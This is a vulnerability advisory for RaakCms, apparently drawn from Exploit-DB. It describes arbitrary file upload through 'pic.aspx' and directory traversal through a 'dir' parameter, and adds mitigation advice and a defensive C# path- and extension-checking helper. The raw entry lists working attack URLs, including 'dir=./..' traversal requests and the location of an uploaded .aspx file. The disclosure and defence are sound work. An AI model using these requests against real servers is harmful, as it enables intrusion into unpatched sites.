Vendor: RaakCms
By: Pouya Daneshmand
CVSS: 8.8 (HIGH)
Title: Arbitrary File Upload & Directory Traversal
CWE: 434, 22
Product Name: RaakCms
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2020

Arbitrary File Upload & Directory Traversal in RaakCms

An attacker can upload arbitrary files to the server through the 'pic.aspx' page, which accepts any file type (including server-side scripts such as .aspx) and stores the upload under 'User_Images', where it is reachable over HTTP. An attacker can also traverse the server's directory structure through the 'dir' parameter of the 'browse.asp' and 'browseFile.asp' pages.

Mitigation:

Restrict access to the 'pic.aspx', 'browse.asp' and 'browseFile.asp' pages and ensure that only authorized users can access them. Ensure that all uploaded files are scanned for malicious content.
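As an added illustration of the server-side checks behind that mitigation (example code written for this page, not RaakCms's own): an ASP.NET helper that allowlists upload extensions so that .aspx/.asp content is never accepted, and confines a user-supplied 'dir' value to the images root so that a value such as './..' is rejected. The root path, class and method names are assumptions.

```csharp
using System;
using System.IO;
using System.Linq;

// Added example, not RaakCms code. Defensive checks that a browse or upload
// handler would apply before touching the file system. The root directory
// and the extension allowlist below are assumptions for illustration.
public static class PathGuards
{
    // Only image types are expected under User_Images; server-side scripts
    // such as .aspx or .asp are never part of the allowlist.
    private static readonly string[] AllowedExtensions =
        { ".jpg", ".jpeg", ".png", ".gif" };

    // Accepts a client-supplied file name only if it carries exactly one
    // extension and that extension is in the allowlist.
    public static bool IsAllowedUploadName(string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName)) return false;
        string name = Path.GetFileName(fileName);          // drop any path prefix
        if (name.Count(c => c == '.') != 1) return false;  // refuse "a.aspx.jpg"
        string ext = Path.GetExtension(name).ToLowerInvariant();
        return AllowedExtensions.Contains(ext);
    }

    // Resolves 'requestedDir' (the browse.asp 'dir' parameter, or the folder
    // chosen in pic.aspx) against 'root' and returns the normalized path, or
    // null when the result would leave the root ("./.." or an absolute path).
    public static string ResolveWithinRoot(string root, string requestedDir)
    {
        char sep = Path.DirectorySeparatorChar;
        string fullRoot = Path.GetFullPath(root).TrimEnd(sep) + sep;
        string candidate = Path.GetFullPath(
            Path.Combine(fullRoot, requestedDir ?? string.Empty));
        if (!candidate.EndsWith(sep.ToString())) candidate += sep;
        // Windows file systems are case-insensitive, so compare accordingly.
        bool inside = candidate.StartsWith(fullRoot, StringComparison.OrdinalIgnoreCase);
        return inside ? candidate : null;
    }

    public static void Main()
    {
        string root = @"C:\inetpub\wwwroot\User_Images";   // assumed location
        Console.WriteLine("photo.jpg allowed: " + IsAllowedUploadName("photo.jpg"));
        Console.WriteLine("FILE.ASPX allowed: " + IsAllowedUploadName("FILE.ASPX"));
        Console.WriteLine("gallery inside root: " + (ResolveWithinRoot(root, "gallery") != null));
        Console.WriteLine("./.. inside root: " + (ResolveWithinRoot(root, "./..") != null));
    }
}
```

Both checks belong in addition to, not instead of, the authentication the mitigation calls for: an authenticated but malicious user still must not be able to place scripts under the web root or read outside the images folder.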

Exploit-DB raw data:

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: RaakCms
# Vendor: http://raakcms.com
#################################################################
Vulnerability:
=======================
Arbitrary File Upload
=======================
http://server/webmaster/pic.aspx
Select a file and a folder; your file is uploaded here:
http://server/User_Images/[Folder]/FILE.ASPX

=======================
Directory Traversal
=======================
http://server/browse.asp?dir=./..
http://server/browseFile.asp?dir=./..
#################################################################

#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
#################################################################